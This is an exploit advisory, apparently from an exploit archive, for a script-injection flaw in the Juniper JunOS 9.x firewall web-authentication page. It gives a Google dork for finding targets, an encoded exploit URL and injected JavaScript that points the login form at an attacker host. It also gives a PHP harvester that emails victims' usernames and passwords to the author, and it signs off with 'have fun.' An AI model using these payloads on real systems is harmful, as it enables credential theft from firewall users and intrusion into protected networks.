Juniper JunOS 9.x Cross Site Scripting

`Exploit Title: Juniper JUNOS 9.X HTML Injection Vulnerability  
Google Dork: intext:"2009, Juniper Networks" intext:"Firewall User Web-Authentication"  
Date: Jul 24th 2013  
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)  
Vendor Homepage: http://www.juniper.net  
Version: JUNOS 9.X  
Tested on: Firefox 22.0  
  
  
  
Description:  
------------  
The Juniper Firewall has a PHP authentication and authorization   
page for using ports and services that usually are not enabled.   
The page contains a html form that sends authentication requests  
to the following url:   
  
"https:/<ip>/?target=&auth_id=&ap_name="   
  
Looking at this URL we can see that, along with your username  
and password, will be sent the variables $target, $auth_id and  
$ap_name. The contents of these variables is placed in the  
destination URL of the html form ("action" argument), so   
injecting HTML code into these variables can change the form,  
and you can change the "action" parameters for collect username  
and password on external page.  
  
  
  
Exploit:  
--------  
The exploit consists on injecting DOM functions for   
replace the "action" parameters into the tag <form>  
with an external URL that will collects username  
and password used by the users. You can use the  
DOM function "setAttribute" for replace the "action"  
parameters, like this script:  
  
<script>  
var f = document.getElementsByTagName('form')[0];  
f.setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php');  
</script>  
  
Exploit URL:  
  
https://<firewall ip>/?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/fuck.php%27%29%3C/script%3E%3Ca%20href=%22  
  
url-decoded, appears like this:  
  
https://<firewall ip>/?target=&auth_id=&ap_name="><script>document.getElementsByTagName('form')[0].setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php')</script><a href="  
  
The PHP script "fuck.php" will receive, via POST http request,  
the username and password. I've write this exploit that sends  
me an email when a new username and password received, and then  
redirect the users to the original firewall's login page.  
  
  
<?php  
// send me your password  
mail(  
'[email protected]',  
'new juniper password',  
"user: ".$_POST['username']."\npass: ".$_POST['password']."\n\n",  
"From: Jesus <[email protected]>\n"  
);  
  
// taking user to home  
header("Location: https://10.0.0.1");  
?>  
  
  
  
  
have fun.  
  
--  
Andrea (aka und3r) Menin  
menin.andrea [at] gmail.com  
linkedin.com/in/andreamenin  
`